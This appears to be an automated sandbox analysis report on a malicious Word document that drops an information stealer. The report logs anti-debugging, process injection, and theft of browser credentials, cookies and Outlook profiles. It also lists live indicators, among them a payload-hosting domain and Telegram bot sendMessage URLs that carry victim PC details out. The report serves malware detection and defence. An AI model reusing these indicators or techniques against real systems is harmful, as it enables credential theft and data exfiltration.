          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597188s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -597078s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596969s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596859s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596750s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596638s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596516s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596406s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596287s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596156s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -596016s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595688s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595577s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595468s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595359s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595250s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595141s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -595031s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594922s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594812s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594703s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594594s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594469s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594359s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594249s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594141s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -594031s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -593922s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -593812s >= -30000s
          Source: C:\Users\Public\Libraries\npratlsN.pif TID: 480Thread sleep time: -593703s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029058B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_029058B4
          Source: Nsltarpn.PIF, 0000000F.00000002.2047274828.0000000000568000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
          Source: Nsltarpn.PIF, 0000000B.00000002.1972185080.00000000005FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
          Source: npratlsN.pif, 00000012.00000003.2616496308.000000001EB14000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3074389278.000000001EAE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
          Source: brightness.exe, 00000004.00000002.1853607956.00000000008A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: brightness.exe, 00000004.00000002.1853607956.000000000088D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP9
          Source: npratlsN.pif, 00000008.00000002.3085404507.000000002AFE0000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3080226661.0000000032424000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\SysWOW64\brightness.exeAPI call chain: ExitProcess graph end nodegraph_4-29804
          Source: C:\Users\Public\Libraries\npratlsN.pifAPI call chain: ExitProcess graph end nodegraph_8-84502
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFAPI call chain: ExitProcess graph end node
          Source: C:\Users\Public\Libraries\npratlsN.pifAPI call chain: ExitProcess graph end node
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation

          Anti Debugging

          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,4_2_0291F024
          Source: C:\Windows\SysWOW64\brightness.exe Process queried: DebugPort
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Process queried: DebugPort
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_2C887A28 LdrInitializeThunk,8_2_2C887A28
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918798 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02918798
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040ADB0 GetProcessHeap,HeapFree,8_2_0040ADB0
          Source: C:\Users\Public\Libraries\npratlsN.pifProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_0040E61C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00416F6A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004123F1 SetUnhandledExceptionFilter,8_2_004123F1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_1_0040E61C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_1_00416F6A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_1_004123F1 SetUnhandledExceptionFilter,8_1_004123F1
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040CE09
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_0040E61C
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00416F6A
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 14_2_004123F1 SetUnhandledExceptionFilter,14_2_004123F1
          Source: C:\Users\Public\Libraries\npratlsN.pifMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\SysWOW64\brightness.exe Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Memory allocated: C:\Users\Public\Libraries\npratlsN.pif base: 400000 protect: page execute and read and write
          Source: C:\Windows\SysWOW64\brightness.exe Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Section unmapped: C:\Users\Public\Libraries\npratlsN.pif base address: 400000
          Source: C:\Windows\SysWOW64\brightness.exe Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 33C008
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 240008
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Memory written: C:\Users\Public\Libraries\npratlsN.pif base: 226008
          Source: C:\Windows\SysWOW64\brightness.exe Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Process created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Windows\SysWOW64\brightness.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02905A78
          Source: C:\Windows\SysWOW64\brightness.exe Code function: GetLocaleInfoA,4_2_0290A790
          Source: C:\Windows\SysWOW64\brightness.exe Code function: GetLocaleInfoA,4_2_0290A744
          Source: C:\Windows\SysWOW64\brightness.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,4_2_02905B84
          Source: C:\Users\Public\Libraries\npratlsN.pif Code function: GetLocaleInfoA,8_2_00417A20
          Source: C:\Users\Public\Libraries\npratlsN.pif Code function: GetLocaleInfoA,8_1_00417A20
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_027D5A78
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Code function: GetLocaleInfoA,11_2_027DA790
          Source: C:\Users\Public\Libraries\Nsltarpn.PIF Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,11_2_027D5B83
          Source: C:\Users\Public\Libraries\npratlsN.pif Code function: GetLocaleInfoA,14_2_00417A20
          Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\Libraries\npratlsN.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Windows\SysWOW64\brightness.exe Code function: 4_2_0290918C GetLocalTime,4_2_0290918C
          Source: C:\Windows\SysWOW64\brightness.exe Code function: 4_2_0290B70C GetVersionExA,4_2_0290B70C
          Source: C:\Users\Public\Libraries\npratlsN.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
          Source: C:\Users\Public\Libraries\npratlsN.pif File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
          Source: C:\Users\Public\Libraries\npratlsN.pif Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

          Remote Access Functionality

          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | 22 Scripting | 1 Valid Accounts | 1 Native API | 22 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 11 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
          Credentials | Domains | Default Accounts | 1 Shared Modules | 1 DLL Side-Loading | 1 Valid Accounts | 11 Deobfuscate/Decode Files or Information | LSASS Memory | 1 System Network Connections Discovery | Remote Desktop Protocol | 1 Data from Local System | 13 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | 33 Exploitation for Client Execution | 1 Valid Accounts | 1 Access Token Manipulation | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 311 Process Injection | 3 Software Packing | NTDS | 36 System Information Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 Registry Run Keys / Startup Folder | 1 Timestomp | LSA Secrets | 1 Query Registry | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 141 Security Software Discovery | VNC | GUI Input Capture | 234 Application Layer Protocol | Data Transfer Size Limits | Service Stop
          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 221 Masquerading | DCSync | 41 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Valid Accounts | Proc Filesystem | 2 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
          Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
          IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 41 Virtualization/Sandbox Evasion | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
          Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 311 Process Injection | Input Capture | System Network Connections Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
          [Behavior graph. Behavior Graph ID: 1584674, Sample: PI ITS15235.doc, Startdate: 06/01/2025, Architecture: WINDOWS, Score: 100]

          Source | Detection | Scanner | Label | Link
          PI ITS15235.doc | 100% | Avira | W97M/Agent.5915124 |
          PI ITS15235.doc | 100% | Joe Sandbox ML | |

          Source | Detection | Scanner | Label | Link
          C:\Users\Public\Libraries\npratlsN.pif | 3% | ReversingLabs | |

          No Antivirus matches
          No Antivirus matches

          Source | Detection | Scanner | Label | Link
          https://amazonenviro.com/245_Nsltarpnconi | 0% | Avira URL Cloud | safe |
          https://amazonenviro.com:443/245_Nsltarpncon | 0% | Avira URL Cloud | safe |
          http://e6.o.lencr.org0 | 0% | Avira URL Cloud | safe |
          http://crl.verisign.P | 0% | Avira URL Cloud | safe |
          https://amazonenviro.com/245_Nsltarpncon | 0% | Avira URL Cloud | safe |
          http://mail.irco.com.sa | 0% | Avira URL Cloud | safe |
          http://x1.i.lencr.or | 0% | Avira URL Cloud | safe |
          https://amazonenviro.com/ | 0% | Avira URL Cloud | safe |
          https://amazonenviro.com/245_Nsltarpncon4 | 0% | Avira URL Cloud | safe |
          https://amazonenviro.com/245_Nsltarpnconu | 0% | Avira URL Cloud | safe |
          http://crl.verisign. | 0% | Avira URL Cloud | safe |
          http://x1.c.lenc | 0% | Avira URL Cloud | safe |

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          reallyfreegeoip.org | 188.114.96.3 | true | false | | high
          amazonenviro.com | 166.62.27.188 | true | true | | unknown
          api.telegram.org | 149.154.167.220 | true | false | | high
          mail.irco.com.sa | 46.151.208.21 | true | true | | unknown
          checkip.dyndns.com | 158.101.44.242 | true | false | | high
          checkip.dyndns.org | unknown | unknown | false | | high

          Name | Malicious | Antivirus Detection | Reputation
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:55:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
          https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high
          http://checkip.dyndns.org/ | false | | high
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2015:16:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high
          https://amazonenviro.com/245_Nsltarpncon | true | Avira URL Cloud: safe | unknown
          https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:536720%0D%0ADate%20and%20Time:%2006/01/2025%20/%2018:43:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20536720%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | high

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://duckduckgo.com/chrome_newtab | npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://duckduckgo.com/ac/?q= | npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmp | false | | high
          https://api.telegram.org | npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                      http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                        high
                                        http://ocsp.sectigo.com0brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.org/botnpratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3076785533.0000000028B56000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000342E6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.00000000209C9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3088190466.0000000023470000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://www.office.com/PnpratlsN.pif, 0000000E.00000002.3083897007.00000000343EF000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                high
                                                https://www.office.com/lBnpratlsN.pif, 00000008.00000002.3076785533.0000000028C5A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3083897007.00000000343F9000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075519147.0000000020AEC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=npratlsN.pif, 00000008.00000002.3080832543.0000000029B4A000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.0000000035584000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3088690574.00000000355B6000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C34000.00000004.00000800.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3078285306.0000000021C67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
